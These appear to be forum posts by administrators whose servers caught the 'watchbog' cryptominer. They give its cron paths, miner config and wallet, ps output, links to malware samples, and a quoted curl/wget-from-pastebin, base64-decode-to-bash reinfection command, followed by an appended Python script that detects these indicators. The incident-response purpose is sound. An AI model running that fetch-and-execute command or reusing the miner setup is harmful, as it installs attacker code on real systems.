Watchbog cryptomining. Who can get some more info about it? [on hold]

This is a comment on a previous post, "A process called ./watchbog is mining crypto currency on our server. How do I stop it?"

It happened to me on a RHEL 6 system and I wanted to share my info in case anyone wants to investigate further.

As previously pointed out, it stores some info in /var/spool/abrt; it may have infected /usr/libexec/abrt-hook-ccpp (dunno for sure).

It edits root's crontab and creates some cron files as well. The paths of the cron files:

/etc/cron.hourly/oanacrone
/etc/cron.daily/oanacrone
/etc/cron.monthly/oanacrone
/etc/cron.d/apache
/etc/cron.d/root
/etc/cron.d/system

Full content of the cron files: https://pastebin.com/raw/aWKzdq61

Zip file with binaries: https://wetransfer.com/downloads/c56efdeee48cffb2c831ddc274b2497b20190114220026/26a0f790716a7dd8a6afb2978310f3e320190114220026/05e18f

New Linux virus “watchbog”. What could be the cause?

This question has already been brought up here, but was poorly answered with generic answers, like "reinstall everything", and no actual solution or cause.

So here's my story: there is a new virus out there which creates a process called "WATCHBOG" and eats all the CPU on the server. After further investigation, I found out that this virus is mining cryptocurrency.

Full story:

Server specs:
OS: Ubuntu server 16.04.5 LTS
Software: Apache2 with virtualhosts, MySQL, PHP5.6, PHP7

When I found out that this web server was infected, web pages still worked, but awfully slowly. So the first thing I saw was the watchbog process, which eats all the CPU, so I tried to kill it, but it reappears instantly, and everything is so slow that it is almost impossible to operate the server. Next I thought, "OK, I need to terminate this process", so I decided to put "* * * * * killall watchbog" in crontab. So I opened crontab and found out that it was compromised as well, so I removed this new entry from crontab, I deleted the watchbog file, and after a minute or two everything magically reappeared. Crontab got compromised again to run some kind of remote script, and the watchbog process was up and eating CPU again.

I tried to find anything useful on the web, and found these articles:

Here is the most helpful one: https://sudhakarbellamkonda.blogspot…50061219193777

After following this article the watchbog virus still reappeared, so I came up with this solution: open a screen session as root and then run this loop: ( while true ; do killall watchbog ; done ) and leave it running in the background by detaching the screen session with CTRL+A+D. I posted this solution in that blog as well. And here is one other post, but nothing really is helpful there:
https://unix.stackexchange.com/questions/487437/a-strange-process-called-watchbog-is-hogging-my-entire-cpu-and-i-cant-get-rid

So I tried fighting this virus many ways, changed passwords, reinstalled SSH, etc., and no luck. Meanwhile I created a new Ubuntu server with the latest 18.04.1 LTS. We installed all the latest web server stuff, enabled UFW, opened the web and FTP ports, then migrated WWW data and SQL, changed the IP back to the original server's IP, and..... there it is AGAIN. The virus came back on the new machine, so I think this virus probably infects the system by using some vulnerability in web server software. We found out that WGET and CURL are responsible for distributing the virus around the system; now we are trying to understand how it got there.

If you have any tips, please help find the vulnerability.

P.S. This is my first question, judge me softly please 🙂

A process called ./watchbog is mining crypto currency on our server. How do I stop it?

I have found this question here, but I have some more clarification, which is why I am writing again.

I have a process called "watchbog" that is completely hogging my CPU, and I don't know what it is.

So I did some digging, and found that an executable is being run from the /tmp directory. The folder structure is something like this:

/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data 

In that folder there are two files: one executable, watchbog, which is actually being run, and one config.json. This is the content of the config file:

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "asm": true,
    "autosave": true,
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": 3,
    "donate-level": 1,
    "huge-pages": false,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "pool.minexmr.com:443",
            "user": "4AbjKdQkedGZXvzm6VxMJb1zLB2CAmCmXdoCisRsQFAUPs4TWFePDUcZzk5ui4EdZXT3uaXXtssqPCoKQPTz7PeZNkKASkm.old",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": [
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        },
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        }
    ],
    "user-agent": null,
    "syslog": false,
    "watch": false
}

But deleting the folders is not helping; they are being recreated within a few seconds. So I tried to see what other processes are running, and I found these:

solr     32616  0.0  0.0   4504   780 ?        Ss   13:10   0:00 /bin/sh -c (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- h
solr     32618  0.0  0.0  11224  2924 ?        S    13:10   0:00 bash
solr     32623  0.2  0.0  11644  3376 ?        S    13:10   0:00 /bin/bash
solr     32656  200  0.1 270204  6996 ?        Ssl  13:10   0:26 ./watchbog

The pastebin URL points to another shell command with another pastebin URL.

(curl -fsSL https://pastebin.com/raw/nMrfmnRa||wget -q -O- https://pastebin.com/raw/nMrfmnRa) | base64 -d | /bin/bash 

This second pastebin URL points to a base64-encoded shell script. I can't include it here due to the character limit. Here is the link: https://pastebin.com/raw/nMrfmnRa

I am no expert in this field, but it looks like the script is setting a cron job which downloads the executable again.

This is all I could find on my own. Can anyone please guide me as to how I can stop this whole thing, or would I have to redeploy the server again?
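A triage script for the indicators the three posts above describe, added here as an example and not written by any of the posters: it scans ps aux rows and cron files for the watchbog process name, the cron file paths listed in the first post, the /tmp/systemd-private-* drop directory, and the curl/wget-from-pastebin, base64 -d, bash chain shown in the third post. The tag names, the CPU threshold and the sample rows used to exercise it are my own assumptions.

```python
import re

# Indicators taken from the posts above: the miner's process name, the cron files the first
# post lists, the /tmp/systemd-private-* drop directory and the fetch-decode-execute chain
# (curl||wget from pastebin -> base64 -d -> bash). The CPU threshold is my own choice.
MINER_NAMES = {"watchbog"}
KNOWN_CRON_FILES = {"/etc/cron.hourly/oanacrone", "/etc/cron.daily/oanacrone",
                    "/etc/cron.monthly/oanacrone", "/etc/cron.d/apache",
                    "/etc/cron.d/root", "/etc/cron.d/system"}
PASTE_FETCH = re.compile(r"\b(?:curl|wget)\b[^|;]*https?://pastebin\.com/raw/\w+", re.I)
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:/bin/)?(?:ba)?sh\b")
DROP_DIR = re.compile(r"/tmp/systemd-private-\S*systemd-timesyncc\.service-")
CPU_ALERT = 90.0  # assumed: a single process at or above this %CPU deserves a look

def command_indicators(cmd):
    """Indicator tags tripped by one command string (a ps COMMAND column or a cron line)."""
    words = cmd.split()
    tags = set()
    if words and words[0].rsplit("/", 1)[-1] in MINER_NAMES:  # "./watchbog" -> "watchbog"
        tags.add("miner-process")
    for tag, rx in (("pastebin-fetch", PASTE_FETCH), ("decode-and-execute", DECODE_TO_SHELL),
                    ("tmp-drop-dir", DROP_DIR)):
        if rx.search(cmd):
            tags.add(tag)
    return tags

def triage_ps(lines):
    """Scan ps aux rows; return pid -> (user, sorted tags) for rows tripping an indicator."""
    hits = {}
    for line in lines:
        parts = line.split(None, 10)  # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        if len(parts) < 11 or not parts[1].isdigit():
            continue  # header row or truncated line
        user, pid, cpu, cmd = parts[0], int(parts[1]), float(parts[2]), parts[10]
        tags = command_indicators(cmd) | ({"cpu-hog"} if cpu >= CPU_ALERT else set())
        if tags:
            hits[pid] = (user, sorted(tags))
    return hits

def triage_cron(files):
    """files: {path: content}; return path -> sorted tags for known names or download-and-run lines."""
    hits = {}
    for path, content in files.items():
        tags = {"known-dropper-path"} if path in KNOWN_CRON_FILES else set()
        for line in content.splitlines():
            if line.strip() and not line.lstrip().startswith("#"):
                tags |= command_indicators(line)
        if tags:
            hits[path] = sorted(tags)
    return hits
```

Feed it the output of ps aux and the contents of /etc/cron.d, /etc/cron.*/ and each user's crontab; a row tagged only cpu-hog is a lead, while pastebin-fetch or decode-and-execute on a cron line is the re-infection hook the posts describe.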